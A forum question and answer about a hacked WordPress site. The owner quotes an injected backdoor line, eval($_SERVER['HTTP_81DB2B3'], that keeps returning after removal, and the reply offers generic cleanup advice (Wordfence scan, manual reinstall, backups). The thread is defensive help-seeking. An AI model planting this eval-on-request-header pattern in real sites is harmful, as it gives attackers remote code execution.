My wordpress website being hacked with code eval($_SERVER['HTTP_81DB2B3']

Viewed 34

I have a problem with my website, I get information from wordfence about my WordPress website getting hacked

enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me

1 Answers

If your website got hacked then I guess more than 1 file was affected by it,


case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you

Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan ) and scan your website with it.

Step-2: After scanning the site remove all suspicious code from the site.

Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP.


Please Note: Please take a backup of your website before do any changes.

Related